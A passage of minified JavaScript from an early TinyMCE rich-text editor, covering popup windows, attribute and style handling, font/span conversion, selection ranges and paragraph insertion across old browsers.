height+=20;x=parseInt(screen.width/2.0)-(width/2.0);y=parseInt(screen.height/2.0)-(height/2.0);resizable=(args&&args['resizable'])?args['resizable']:"no";scrollbars=(args&&args['scrollbars'])?args['scrollbars']:"no";if(template['file'].charAt(0)!='/'&&template['file'].indexOf('://')==-1)url=tinyMCE.baseURL+"/themes/"+tinyMCE.getParam("theme")+"/"+template['file'];else url=template['file'];for(var name in args){if(typeof(args[name])=='function')continue;url=tinyMCE.replaceVar(url,name,escape(args[name]));}if(html){html=tinyMCE.replaceVar(html,"css",this.settings['popups_css']);html=tinyMCE.applyTemplate(html,args);var win=window.open("","mcePopup"+new Date().getTime(),"top="+y+",left="+x+",scrollbars="+scrollbars+",dialog=yes,minimizable="+resizable+",modal=yes,width="+width+",height="+height+",resizable="+resizable);if(win==null){alert(tinyMCELang['lang_popup_blocked']);return;}win.document.write(html);win.document.close();win.resizeTo(width,height);win.focus();}else{if(tinyMCE.isMSIE&&resizable!='yes'&&tinyMCE.settings["dialog_type"]=="modal"){var features="resizable:"+resizable+";scroll:"+scrollbars+";status:yes;center:yes;help:no;dialogWidth:"+width+"px;dialogHeight:"+height+"px;";window.showModalDialog(url,window,features);}else{var modal=(resizable=="yes")?"no":"yes";if(tinyMCE.isGecko&&tinyMCE.isMac)modal="no";if(template['close_previous']!="no")try{tinyMCE.lastWindow.close();}catch(ex){}var win=window.open(url,"mcePopup"+new Date().getTime(),"top="+y+",left="+x+",scrollbars="+scrollbars+",dialog="+modal+",minimizable="+resizable+",modal="+modal+",width="+width+",height="+height+",resizable="+resizable);if(win==null){alert(tinyMCELang['lang_popup_blocked']);return;}if(template['close_previous']!="no")tinyMCE.lastWindow=win;eval('try { win.resizeTo(width, height); } catch(e) { }');if(tinyMCE.isGecko){if(win.document.defaultView.statusbar.visible)win.resizeBy(0,tinyMCE.isMac?10:24);}win.focus();}}};TinyMCE.prototype.closeWindow=function(win){win.close();};TinyMCE.prototype.getVisualAidClass=function(class_name,state){var aidClass=tinyMCE.settings['visual_table_class'];if(typeof(state)=="undefined")state=tinyMCE.settings['visual'];var classNames=new Array();var ar=class_name.split(' ');for(var i=0;i<ar.length;i++){if(ar[i]==aidClass)ar[i]="";if(ar[i]!="")classNames[classNames.length]=ar[i];}if(state)classNames[classNames.length]=aidClass;var className="";for(var i=0;i<classNames.length;i++){if(i>0)className+=" ";className+=classNames[i];}return className;};TinyMCE.prototype.handleVisualAid=function(el,deep,state,inst){if(!el)return;var tableElement=null;switch(el.nodeName){case "TABLE":var oldW=el.style.width;var oldH=el.style.height;var bo=tinyMCE.getAttrib(el,"border");bo=bo==""||bo=="0"?true:false;tinyMCE.setAttrib(el,"class",tinyMCE.getVisualAidClass(tinyMCE.getAttrib(el,"class"),state&&bo));el.style.width=oldW;el.style.height=oldH;for(var y=0;y<el.rows.length;y++){for(var x=0;x<el.rows[y].cells.length;x++){var cn=tinyMCE.getVisualAidClass(tinyMCE.getAttrib(el.rows[y].cells[x],"class"),state&&bo);tinyMCE.setAttrib(el.rows[y].cells[x],"class",cn);}}break;case "A":var anchorName=tinyMCE.getAttrib(el,"name");if(anchorName!=''&&state){el.title=anchorName;el.className='mceItemAnchor';}else if(anchorName!=''&&!state)el.className='';break;}if(deep&&el.hasChildNodes()){for(var i=0;i<el.childNodes.length;i++)tinyMCE.handleVisualAid(el.childNodes[i],deep,state,inst);}};TinyMCE.prototype.getAttrib=function(elm,name,default_value){if(typeof(default_value)=="undefined")default_value="";if(!elm||elm.nodeType!=1)return default_value;var v=elm.getAttribute(name);if(name=="class"&&!v)v=elm.className;if(name=="style"&&!tinyMCE.isOpera)v=elm.style.cssText;return(v&&v!="")?v:default_value;};TinyMCE.prototype.setAttrib=function(element,name,value,fix_value){if(typeof(value)=="number"&&value!=null)value=""+value;if(fix_value){if(value==null)value="";var re=new RegExp('[^0-9%]','g');value=value.replace(re,'');}if(name=="style")element.style.cssText=value;if(name=="class")element.className=value;if(value!=null&&value!=""&&value!=-1)element.setAttribute(name,value);else element.removeAttribute(name);};TinyMCE.prototype.setStyleAttrib=function(elm,name,value){eval('elm.style.'+name+'=value;');if(tinyMCE.isMSIE&&value==null||value==''){var str=tinyMCE.serializeStyle(tinyMCE.parseStyle(elm.style.cssText));elm.style.cssText=str;elm.setAttribute("style",str);}};TinyMCE.prototype.convertSpansToFonts=function(doc){var sizes=tinyMCE.getParam('font_size_style_values').replace(/\s+/,'').split(',');var h=doc.body.innerHTML;h=h.replace(/<span/gi,'<font');h=h.replace(/<\/span/gi,'</font');doc.body.innerHTML=h;var s=doc.getElementsByTagName("font");for(var i=0;i<s.length;i++){var size=tinyMCE.trim(s[i].style.fontSize).toLowerCase();var fSize=0;for(var x=0;x<sizes.length;x++){if(sizes[x]==size){fSize=x+1;break;}}if(fSize>0){tinyMCE.setAttrib(s[i],'size',fSize);s[i].style.fontSize='';}var fFace=s[i].style.fontFamily;if(fFace!=null&&fFace!=""){tinyMCE.setAttrib(s[i],'face',fFace);s[i].style.fontFamily='';}var fColor=s[i].style.color;if(fColor!=null&&fColor!=""){tinyMCE.setAttrib(s[i],'color',tinyMCE.convertRGBToHex(fColor));s[i].style.color='';}}};TinyMCE.prototype.convertFontsToSpans=function(doc){var sizes=tinyMCE.getParam('font_size_style_values').replace(/\s+/,'').split(',');var h=doc.body.innerHTML;h=h.replace(/<font/gi,'<span');h=h.replace(/<\/font/gi,'</span');doc.body.innerHTML=h;var fsClasses=tinyMCE.getParam('font_size_classes');if(fsClasses!='')fsClasses=fsClasses.replace(/\s+/,'').split(',');else fsClasses=null;var s=doc.getElementsByTagName("span");for(var i=0;i<s.length;i++){var fSize,fFace,fColor;fSize=tinyMCE.getAttrib(s[i],'size');fFace=tinyMCE.getAttrib(s[i],'face');fColor=tinyMCE.getAttrib(s[i],'color');if(fSize!=""){fSize=parseInt(fSize);if(fSize>0&&fSize<8){if(fsClasses!=null)tinyMCE.setAttrib(s[i],'class',fsClasses[fSize-1]);else s[i].style.fontSize=sizes[fSize-1];}s[i].removeAttribute('size');}if(fFace!=""){s[i].style.fontFamily=fFace;s[i].removeAttribute('face');}if(fColor!=""){s[i].style.color=fColor;s[i].removeAttribute('color');}}};TinyMCE.prototype.setInnerHTML=function(e,h){if(tinyMCE.isMSIE&&!tinyMCE.isOpera){e.innerHTML='<div id="mceTMPElement" style="display: none">TMP</div>'+h;e.firstChild.removeNode(true);}else e.innerHTML=h;};TinyMCE.prototype.getOuterHTML=function(e){if(tinyMCE.isMSIE)return e.outerHTML;var d=e.ownerDocument.createElement("body");d.appendChild(e);return d.innerHTML;};TinyMCE.prototype.setOuterHTML=function(doc,e,h){if(tinyMCE.isMSIE){e.outerHTML=h;return;}var d=e.ownerDocument.createElement("body");d.innerHTML=h;e.parentNode.replaceChild(d.firstChild,e);};TinyMCE.prototype.insertAfter=function(nc,rc){if(rc.nextSibling)rc.parentNode.insertBefore(nc,rc.nextSibling);else rc.parentNode.appendChild(nc);};TinyMCE.prototype.cleanupAnchors=function(doc){var an=doc.getElementsByTagName("a");for(var i=0;i<an.length;i++){if(tinyMCE.getAttrib(an[i],"name")!=""){var cn=an[i].childNodes;for(var x=cn.length-1;x>=0;x--)tinyMCE.insertAfter(cn[x],an[i]);}}};TinyMCE.prototype._setHTML=function(doc,html_content){html_content=tinyMCE.cleanupHTMLCode(html_content);try{tinyMCE.setInnerHTML(doc.body,html_content);}catch(e){if(this.isMSIE)doc.body.createTextRange().pasteHTML(html_content);}if(tinyMCE.isMSIE&&tinyMCE.settings['fix_content_duplication']){var paras=doc.getElementsByTagName("P");for(var i=0;i<paras.length;i++){var node=paras[i];while((node=node.parentNode)!=null){if(node.nodeName.toLowerCase()=="p")node.outerHTML=node.innerHTML;}}var html=doc.body.innerHTML;if(html.indexOf('="mso')!=-1){for(var i=0;i<doc.body.all.length;i++){var el=doc.body.all[i];el.removeAttribute("className","",0);el.removeAttribute("style","",0);}html=doc.body.innerHTML;html=tinyMCE.regexpReplace(html,"<o:p><\/o:p>","<br />");html=tinyMCE.regexpReplace(html,"<o:p> <\/o:p>","");html=tinyMCE.regexpReplace(html,"<st1:.*?>","");html=tinyMCE.regexpReplace(html,"<p><\/p>","");html=tinyMCE.regexpReplace(html,"<p><\/p>\r\n<p><\/p>","");html=tinyMCE.regexpReplace(html,"<p> <\/p>","<br />");html=tinyMCE.regexpReplace(html,"<p>\s*(<p>\s*)?","<p>");html=tinyMCE.regexpReplace(html,"<\/p>\s*(<\/p>\s*)?","</p>");}tinyMCE.setInnerHTML(doc.body,html);}tinyMCE.cleanupAnchors(doc);if(tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertSpansToFonts(doc);};TinyMCE.prototype.getImageSrc=function(str){var pos=-1;if(!str)return "";if((pos=str.indexOf('this.src='))!=-1){var src=str.substring(pos+10);src=src.substring(0,src.indexOf('\''));return src;}return "";};TinyMCE.prototype._getElementById=function(element_id){var elm=document.getElementById(element_id);if(!elm){for(var j=0;j<document.forms.length;j++){for(var k=0;k<document.forms[j].elements.length;k++){if(document.forms[j].elements[k].name==element_id){elm=document.forms[j].elements[k];break;}}}}return elm;};TinyMCE.prototype.getEditorId=function(form_element){var inst=this.getInstanceById(form_element);if(!inst)return null;return inst.editorId;};TinyMCE.prototype.getInstanceById=function(editor_id){var inst=this.instances[editor_id];if(!inst){for(var n in tinyMCE.instances){var instance=tinyMCE.instances[n];if(!tinyMCE.isInstance(instance))continue;if(instance.formTargetElementId==editor_id){inst=instance;break;}}}return inst;};TinyMCE.prototype.queryInstanceCommandValue=function(editor_id,command){var inst=tinyMCE.getInstanceById(editor_id);if(inst)return inst.queryCommandValue(command);return false;};TinyMCE.prototype.queryInstanceCommandState=function(editor_id,command){var inst=tinyMCE.getInstanceById(editor_id);if(inst)return inst.queryCommandState(command);return null;};TinyMCE.prototype.setWindowArg=function(name,value){this.windowArgs[name]=value;};TinyMCE.prototype.getWindowArg=function(name,default_value){return(typeof(this.windowArgs[name])=="undefined")?default_value:this.windowArgs[name];};TinyMCE.prototype.getCSSClasses=function(editor_id,doc){var output=new Array();if(typeof(tinyMCE.cssClasses)!="undefined")return tinyMCE.cssClasses;if(typeof(editor_id)=="undefined"&&typeof(doc)=="undefined"){var instance;for(var instanceName in tinyMCE.instances){instance=tinyMCE.instances[instanceName];if(!tinyMCE.isInstance(instance))continue;break;}doc=instance.getDoc();}if(typeof(doc)=="undefined"){var instance=tinyMCE.getInstanceById(editor_id);doc=instance.getDoc();}if(doc){var styles=tinyMCE.isMSIE?doc.styleSheets:doc.styleSheets;if(styles&&styles.length>0){for(var x=0;x<styles.length;x++){var csses=null;eval("try {var csses = tinyMCE.isMSIE ? doc.styleSheets("+x+").rules : doc.styleSheets["+x+"].cssRules;} catch(e) {}");if(!csses)return new Array();for(var i=0;i<csses.length;i++){var selectorText=csses[i].selectorText;if(selectorText){var rules=selectorText.split(',');for(var c=0;c<rules.length;c++){if(rules[c].indexOf(' ')!=-1||rules[c].indexOf(':')!=-1||rules[c].indexOf('mceItem')!=-1)continue;if(rules[c]=="."+tinyMCE.settings['visual_table_class'])continue;if(rules[c].indexOf('.')!=-1){output[output.length]=rules[c].substring(rules[c].indexOf('.')+1);}}}}}}}if(output.length>0)tinyMCE.cssClasses=output;return output;};TinyMCE.prototype.regexpReplace=function(in_str,reg_exp,replace_str,opts){if(in_str==null)return in_str;if(typeof(opts)=="undefined")opts='g';var re=new RegExp(reg_exp,opts);return in_str.replace(re,replace_str);};TinyMCE.prototype.trim=function(str){return str.replace(/^\s*|\s*$/g,"");};TinyMCE.prototype.cleanupEventStr=function(str){str=""+str;str=str.replace('function anonymous()\n{\n','');str=str.replace('\n}','');str=str.replace(/^return true;/gi,'');return str;};TinyMCE.prototype.getAbsPosition=function(node){var pos=new Object();pos.absLeft=pos.absTop=0;var parentNode=node;while(parentNode){pos.absLeft+=parentNode.offsetLeft;pos.absTop+=parentNode.offsetTop;parentNode=parentNode.offsetParent;}return pos;};TinyMCE.prototype.getControlHTML=function(control_name){var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+"_getControlHTML";if(eval("typeof("+templateFunction+")")!='undefined'){var html=eval(templateFunction+"('"+control_name+"');");if(html!="")return tinyMCE.replaceVar(html,"pluginurl",tinyMCE.baseURL+"/plugins/"+themePlugins[i]);}}return eval('TinyMCE_'+tinyMCE.settings['theme']+"_getControlHTML"+"('"+control_name+"');");};TinyMCE.prototype._themeExecCommand=function(editor_id,element,command,user_interface,value){var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+"_execCommand";if(eval("typeof("+templateFunction+")")!='undefined'){if(eval(templateFunction+"(editor_id, element, command, user_interface, value);"))return true;}}templateFunction='TinyMCE_'+tinyMCE.settings['theme']+"_execCommand";if(eval("typeof("+templateFunction+")")!='undefined')return eval(templateFunction+"(editor_id, element, command, user_interface, value);");return false;};TinyMCE.prototype._getThemeFunction=function(suffix,skip_plugins){if(skip_plugins)return 'TinyMCE_'+tinyMCE.settings['theme']+suffix;var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+suffix;if(eval("typeof("+templateFunction+")")!='undefined')return templateFunction;}return 'TinyMCE_'+tinyMCE.settings['theme']+suffix;};TinyMCE.prototype.isFunc=function(func_name){if(func_name==null||func_name=="")return false;return eval("typeof("+func_name+")")!="undefined";};TinyMCE.prototype.exec=function(func_name,args){var str=func_name+'(';for(var i=3;i<args.length;i++){str+='args['+i+']';if(i<args.length-1)str+=',';}str+=');';return eval(str);};TinyMCE.prototype.executeCallback=function(param,suffix,mode){switch(mode){case 0:var state=false;var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){var func="TinyMCE_"+plugins[i]+suffix;if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}}var func='TinyMCE_'+tinyMCE.settings['theme']+suffix;if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}var func=tinyMCE.getParam(param,'');if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}return state;case 1:var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){var func="TinyMCE_"+plugins[i]+suffix;if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}}var func='TinyMCE_'+tinyMCE.settings['theme']+suffix;if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}var func=tinyMCE.getParam(param,'');if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}return false;}};TinyMCE.prototype.debug=function(){var msg="";var elm=document.getElementById("tinymce_debug");if(!elm){var debugDiv=document.createElement("div");debugDiv.setAttribute("className","debugger");debugDiv.className="debugger";debugDiv.innerHTML='\ Debug output:\ <textarea id="tinymce_debug" style="width: 100%; height: 300px" wrap="nowrap"></textarea>';document.body.appendChild(debugDiv);elm=document.getElementById("tinymce_debug");}var args=this.debug.arguments;for(var i=0;i<args.length;i++){msg+=args[i];if(i<args.length-1)msg+=', ';}elm.value+=msg+"\n";};function TinyMCEControl(settings){this.undoLevels=new Array();this.undoIndex=0;this.typingUndoIndex=-1;this.undoRedo=true;this.isTinyMCEControl=true;this.settings=settings;this.settings['theme']=tinyMCE.getParam("theme","default");this.settings['width']=tinyMCE.getParam("width",-1);this.settings['height']=tinyMCE.getParam("height",-1);};TinyMCEControl.prototype.repaint=function(){if(tinyMCE.isMSIE)return;this.getBody().style.display='none';this.getBody().style.display='block';};TinyMCEControl.prototype.switchSettings=function(){if(tinyMCE.configs.length>1&&tinyMCE.currentConfig!=this.settings['index']){tinyMCE.settings=this.settings;tinyMCE.currentConfig=this.settings['index'];}};TinyMCEControl.prototype.fixBrokenURLs=function(){var body=this.getBody();var elms=body.getElementsByTagName("img");for(var i=0;i<elms.length;i++){var src=elms[i].getAttribute('mce_real_src');if(src&&src!="")elms[i].setAttribute("src",src);}var elms=body.getElementsByTagName("a");for(var i=0;i<elms.length;i++){var href=elms[i].getAttribute('mce_real_href');if(href&&href!="")elms[i].setAttribute("href",href);}};TinyMCEControl.prototype.convertAllRelativeURLs=function(){var body=this.getBody();var elms=body.getElementsByTagName("img");for(var i=0;i<elms.length;i++){var src=elms[i].getAttribute('src');if(src&&src!=""){src=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],src);elms[i].setAttribute("src",src);elms[i].setAttribute("mce_real_src",src);}}var elms=body.getElementsByTagName("a");for(var i=0;i<elms.length;i++){var href=elms[i].getAttribute('href');if(href&&href!=""){href=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],href);elms[i].setAttribute("href",href);elms[i].setAttribute("mce_real_href",href);}}};TinyMCEControl.prototype.getSelectedHTML=function(){if(tinyMCE.isSafari){return this.getRng().toString();}var elm=document.createElement("body");if(tinyMCE.isGecko)elm.appendChild(this.getRng().cloneContents());else elm.innerHTML=this.getRng().htmlText;return tinyMCE._cleanupHTML(this,this.contentDocument,this.settings,elm,this.visualAid);};TinyMCEControl.prototype.getBookmark=function(){var rng=this.getRng();if(tinyMCE.isSafari)return rng;if(tinyMCE.isMSIE)return rng;if(tinyMCE.isGecko)return rng.cloneRange();return null;};TinyMCEControl.prototype.moveToBookmark=function(bookmark){if(tinyMCE.isSafari){var sel=this.getSel().realSelection;sel.setBaseAndExtent(bookmark.startContainer,bookmark.startOffset,bookmark.endContainer,bookmark.endOffset);return true;}if(tinyMCE.isMSIE)return bookmark.select();if(tinyMCE.isGecko){var rng=this.getDoc().createRange();var sel=this.getSel();rng.setStart(bookmark.startContainer,bookmark.startOffset);rng.setEnd(bookmark.endContainer,bookmark.endOffset);sel.removeAllRanges();sel.addRange(rng);return true;}return false;};TinyMCEControl.prototype.getSelectedText=function(){if(tinyMCE.isMSIE){var doc=this.getDoc();if(doc.selection.type=="Text"){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText='';}else{var sel=this.getSel();if(sel&&sel.toString)selectedText=sel.toString();else selectedText='';}return selectedText;};TinyMCEControl.prototype.selectNode=function(node,collapse,select_text_node,to_start){if(!node)return;if(typeof(collapse)=="undefined")collapse=true;if(typeof(select_text_node)=="undefined")select_text_node=false;if(typeof(to_start)=="undefined")to_start=true;if(tinyMCE.isMSIE){var rng=this.getBody().createTextRange();try{rng.moveToElementText(node);if(collapse)rng.collapse(to_start);rng.select();}catch(e){}}else{var sel=this.getSel();if(!sel)return;if(tinyMCE.isSafari){sel.realSelection.setBaseAndExtent(node,0,node,node.innerText.length);if(collapse){if(to_start)sel.realSelection.collapseToStart();else sel.realSelection.collapseToEnd();}this.scrollToNode(node);return;}var rng=this.getDoc().createRange();if(select_text_node){var nodes=tinyMCE.getNodeTree(node,new Array(),3);if(nodes.length>0)rng.selectNodeContents(nodes[0]);else rng.selectNodeContents(node);}else rng.selectNode(node);if(collapse){if(!to_start&&node.nodeType==3){rng.setStart(node,node.nodeValue.length);rng.setEnd(node,node.nodeValue.length);}else rng.collapse(to_start);}sel.removeAllRanges();sel.addRange(rng);}this.scrollToNode(node);tinyMCE.selectedElement=null;if(node.nodeType==1)tinyMCE.selectedElement=node;};TinyMCEControl.prototype.scrollToNode=function(node){var pos=tinyMCE.getAbsPosition(node);var doc=this.getDoc();var scrollX=doc.body.scrollLeft+doc.documentElement.scrollLeft;var scrollY=doc.body.scrollTop+doc.documentElement.scrollTop;var height=tinyMCE.isMSIE?document.getElementById(this.editorId).style.pixelHeight:this.targetElement.clientHeight;if(!tinyMCE.settings['auto_resize']&&!(pos.absTop>scrollY&&pos.absTop<(scrollY-25+height)))this.contentWindow.scrollTo(pos.absLeft,pos.absTop-height+25);};TinyMCEControl.prototype.getBody=function(){return this.getDoc().body;};TinyMCEControl.prototype.getDoc=function(){return this.contentWindow.document;};TinyMCEControl.prototype.getWin=function(){return this.contentWindow;};TinyMCEControl.prototype.getSel=function(){if(tinyMCE.isMSIE&&!tinyMCE.isOpera)return this.getDoc().selection;var sel=this.contentWindow.getSelection();if(tinyMCE.isSafari&&!sel.getRangeAt){var newSel=new Object();var doc=this.getDoc();function getRangeAt(idx){var rng=new Object();rng.startContainer=this.focusNode;rng.endContainer=this.anchorNode;rng.commonAncestorContainer=this.focusNode;rng.createContextualFragment=function(html){if(html.charAt(0)=='<'){var elm=doc.createElement("div");elm.innerHTML=html;return elm.firstChild;}return doc.createTextNode("UNSUPPORTED, DUE TO LIMITATIONS IN SAFARI!");};rng.deleteContents=function(){doc.execCommand("Delete",false,"");};return rng;}newSel.focusNode=sel.baseNode;newSel.focusOffset=sel.baseOffset;newSel.anchorNode=sel.extentNode;newSel.anchorOffset=sel.extentOffset;newSel.getRangeAt=getRangeAt;newSel.text=""+sel;newSel.realSelection=sel;newSel.toString=function(){return this.text;};return newSel;}return sel;};TinyMCEControl.prototype.getRng=function(){var sel=this.getSel();if(sel==null)return null;if(tinyMCE.isMSIE&&!tinyMCE.isOpera)return sel.createRange();if(tinyMCE.isSafari){var rng=this.getDoc().createRange();var sel=this.getSel().realSelection;rng.setStart(sel.baseNode,sel.baseOffset);rng.setEnd(sel.extentNode,sel.extentOffset);return rng;}return this.getSel().getRangeAt(0);};TinyMCEControl.prototype._insertPara=function(e){function isEmpty(para){function isEmptyHTML(html){return html.replace(new RegExp('[ \t\r\n]+','g'),'').toLowerCase()=="";}if(para.getElementsByTagName("img").length>0)return false;if(para.getElementsByTagName("table").length>0)return false;if(para.getElementsByTagName("hr").length>0)return false;var nodes=tinyMCE.getNodeTree(para,new Array(),3);for(var i=0;i<nodes.length;i++){if(!isEmptyHTML(nodes[i].nodeValue))return false;}return true;}var doc=this.getDoc();var sel=this.getSel();var win=this.contentWindow;var rng=sel.getRangeAt(0);var body=doc.body;var rootElm=doc.documentElement;var self=this;var blockName="P";var rngBefore=doc.createRange();rngBefore.setStart(sel.anchorNode,sel.anchorOffset);rngBefore.collapse(true);var rngAfter=doc.createRange();rngAfter.setStart(sel.focusNode,sel.focusOffset);rngAfter.collapse(true);var direct=rngBefore.compareBoundaryPoints(rngBefore.START_TO_END,rngAfter)<0;var startNode=direct?sel.anchorNode:sel.focusNode;var startOffset=direct?sel.anchorOffset:sel.focusOffset;var endNode=direct?sel.focusNode:sel.anchorNode;var endOffset=direct?sel.focusOffset:sel.anchorOffset;startNode=startNode.nodeName=="BODY"?startNode.firstChild:startNode;endNode=endNode.nodeName=="BODY"?endNode.firstChild:endNode;var startBlock=tinyMCE.getParentBlockElement(startNode);var endBlock=tinyMCE.getParentBlockElement(endNode);if(startBlock!=null){blockName=startBlock.nodeName;if(blockName=="TD"||blockName=="TABLE"||(blockName=="DIV"&&new RegExp('left|right','gi').test(startBlock.style.cssFloat)))blockName="P";}if(tinyMCE.getParentElement(startBlock,"OL,UL")!=null)return false;if((startBlock!=null&&startBlock.nodeName=="TABLE")||(endBlock!=null&&endBlock.nodeName=="TABLE"))startBlock=endBlock=null;var paraBefore=(startBlock!=null&&startBlock.nodeName==blockName)?startBlock.cloneNode(false):doc.createElement(blockName);var paraAfter=(endBlock!=null&&endBlock.nodeName==blockName)?endBlock.cloneNode(false):doc.createElement(blockName);if(/^(H[1-6])$/.test(blockName))paraAfter=doc.createElement("p");var startChop=startNode;var endChop=endNode;node=startChop;do{if(node==body||node.nodeType==9||tinyMCE.isBlockElement(node))break;startChop=node;}while((node=node.previousSibling?node.previousSibling:node.parentNode));node=endChop;do{if(node==body||node.nodeType==9||tinyMCE.isBlockElement(node))break;endChop=node;}while((node=node.nextSibling?node.nextSibling:node.parentNode));if(startChop.nodeName=="TD")startChop=startChop.firstChild;if(endChop.nodeName=="TD")endChop=endChop.lastChild;if(startBlock==null){rng.deleteContents();sel.removeAllRanges();if(startChop!=rootElm&&endChop!=rootElm){rngBefore=rng.cloneRange();if(startChop==body)rngBefore.setStart(startChop,0);else rngBefore.setStartBefore(startChop);paraBefore.appendChild(rngBefore.cloneContents());if(endChop.parentNode.nodeName==blockName)endChop=endChop.parentNode;rng.setEndAfter(endChop);if(endChop.nodeName!="#text"&&endChop.nodeName!="BODY")rngBefore.setEndAfter(endChop);var contents=rng.cloneContents();if(contents.firstChild&&(contents.firstChild.nodeName==blockName||contents.firstChild.nodeName=="BODY"))paraAfter.innerHTML=contents.firstChild.innerHTML;else paraAfter.appendChild(contents);if(isEmpty(paraBefore))paraBefore.innerHTML=" ";if(isEmpty(paraAfter))paraAfter.innerHTML=" ";rng.deleteContents();rngAfter.deleteContents();rngBefore.deleteContents();paraAfter.normalize();rngBefore.insertNode(paraAfter);paraBefore.normalize();rngBefore.insertNode(paraBefore);}else{body.innerHTML="<"+blockName+"> </"+blockName+"><"+blockName+"> </"+blockName+">";paraAfter=body.childNodes[1];}this.selectNode(paraAfter,true,true);return true;}if(startChop.nodeName==blockName)rngBefore.setStart(startChop,0);else rngBefore.setStartBefore(startChop);rngBefore.setEnd(startNode,startOffset);paraBefore.appendChild(rngBefore.cloneContents());rngAfter.setEndAfter(endChop);rngAfter.setStart(endNode,endOffset);var contents=rngAfter.cloneContents();if(contents.firstChild&&contents.firstChild.nodeName==blockName){paraAfter.innerHTML=contents.firstChild.innerHTML;}else paraAfter.appendChild(contents);if(isEmpty(paraBefore))paraBefore.innerHTML=" ";if(isEmpty(paraAfter))paraAfter.innerHTML=" ";var rng=doc.createRange();if(!startChop.previousSibling&&startChop.parentNode.nodeName.toUpperCase()==blockName){rng.setStartBefore(startChop.parentNode);}else{if(rngBefore.startContainer.nodeName.toUpperCase()==blockName&&rngBefore.startOffset==0)rng.setStartBefore(rngBefore.startContainer);else rng.setStart(rngBefore.startContainer,rngBefore.startOffset);}if(!endChop.nextSibling&&endChop.parentNode.nodeName.toUpperCase()==blockName)rng.setEndAfter(endChop.parentNode);else rng.setEnd(rngAfter.endContainer,rngAfter.endOffset);rng.deleteContents();rng.insertNode(paraAfter);rng.insertNode(paraBefore);paraAfter.normalize();paraBefore.normalize();this.selectNode(paraAfter,true,true);return true;};TinyMCEControl.prototype._handleBackSpace=function(evt_type){var doc=this.getDoc();var sel=this.getSel();if(sel==null)return false;var rng=sel.getRangeAt(0);var node=rng.startContainer;var elm=node.nodeType==3?node.parentNode:node;if(node==null)return;if(elm&&elm.nodeName==""){var para=doc.createElement("p");while(elm.firstChild)para.appendChild(elm.firstChild);elm.parentNode.insertBefore(para,elm);elm.parentNode.removeChild(elm);var rng=rng.cloneRange();rng.setStartBefore(node.nextSibling);rng.setEndAfter(node.nextSibling);rng.extractContents();this.selectNode(node.nextSibling,true,true);}var para=tinyMCE.getParentBlockElement(node);if(para!=null&¶.nodeName.toLowerCase()=='p'&&evt_type=="keypress"){var htm=para.innerHTML;var block=tinyMCE.getParentBlockElement(node);if(htm==""||htm==" "||block.nodeName.toLowerCase()=="li"){var prevElm=para.previousSibling;while(prevElm!=null&&prevElm.nodeType!=1)prevElm=prevElm.previousSibling;if(prevElm==null)return false;var nodes=tinyMCE.getNodeTree(prevElm,new Array(),3);var lastTextNode=nodes.length==0?null:nodes[nodes.length-1];if(lastTextNode!=null)this.selectNode(lastTextNode,true,false,false);para.parentNode.removeChild(para);return true;}}return false;};TinyMCEControl.prototype._insertSpace=function(){return true;};TinyMCEControl.prototype.autoResetDesignMode=function(){if(!tinyMCE.isMSIE&&tinyMCE.settings['auto_reset_designmode']){var sel=this.getSel();if(!sel||!sel.rangeCount||sel.rangeCount==0)eval('try { this.getDoc().designMode = "On"; } catch(e) {}');}};TinyMCEControl.prototype.isDirty=function(){return this.startContent!=tinyMCE.trim(this.getBody().innerHTML)&&!tinyMCE.isNotDirty;};TinyMCEControl.prototype._mergeElements=function(scmd,pa,ch,override){if(scmd=="removeformat"){pa.className="";pa.style.cssText="";ch.className="";ch.style.cssText="";return;}var st=tinyMCE.parseStyle(tinyMCE.getAttrib(pa,"style"));var stc=tinyMCE.parseStyle(tinyMCE.getAttrib(ch,"style"));var className=tinyMCE.getAttrib(pa,"class");className+=" "+tinyMCE.getAttrib(ch,"class");if(override){for(var n in st){if(typeof(st[n])=='function')continue;stc[n]=st[n];}}else{for(var n in stc){if(typeof(stc[n])=='function')continue;st[n]=stc[n];}}tinyMCE.setAttrib(pa,"style",tinyMCE.serializeStyle(st));tinyMCE.setAttrib(pa,"class",tinyMCE.trim(className));ch.className="";ch.style.cssText="";ch.removeAttribute("class");ch.removeAttribute("style");};TinyMCEControl.prototype.setUseCSS=function(b){var doc=this.getDoc();try{doc.execCommand("useCSS",false,!b);}catch(ex){}try{doc.execCommand("styleWithCSS",false,b);}catch(ex){}};TinyMCEControl.prototype.execCommand=function(command,user_interface,value){var doc=this.getDoc();var win=this.getWin();var focusElm=this.getFocusElement();if(this.lastSafariSelection&&!new RegExp('mceStartTyping|mceEndTyping|mceBeginUndoLevel|mceEndUndoLevel|mceAddUndoLevel','gi').test(command)){this.moveToBookmark(this.lastSafariSelection);tinyMCE.selectedElement=this.lastSafariSelectedElement;}if(!tinyMCE.isMSIE&&!this.useCSS){this.setUseCSS(false);this.useCSS=true;}this.contentDocument=doc;if(tinyMCE._themeExecCommand(this.editorId,this.getBody(),command,user_interface,value))return;if(focusElm&&focusElm.nodeName=="IMG"){var align=focusElm.getAttribute('align');var img=command=="JustifyCenter"?focusElm.cloneNode(false):focusElm;switch(command){case "JustifyLeft":if(align=='left')img.removeAttribute('align');else img.setAttribute('align','left');var 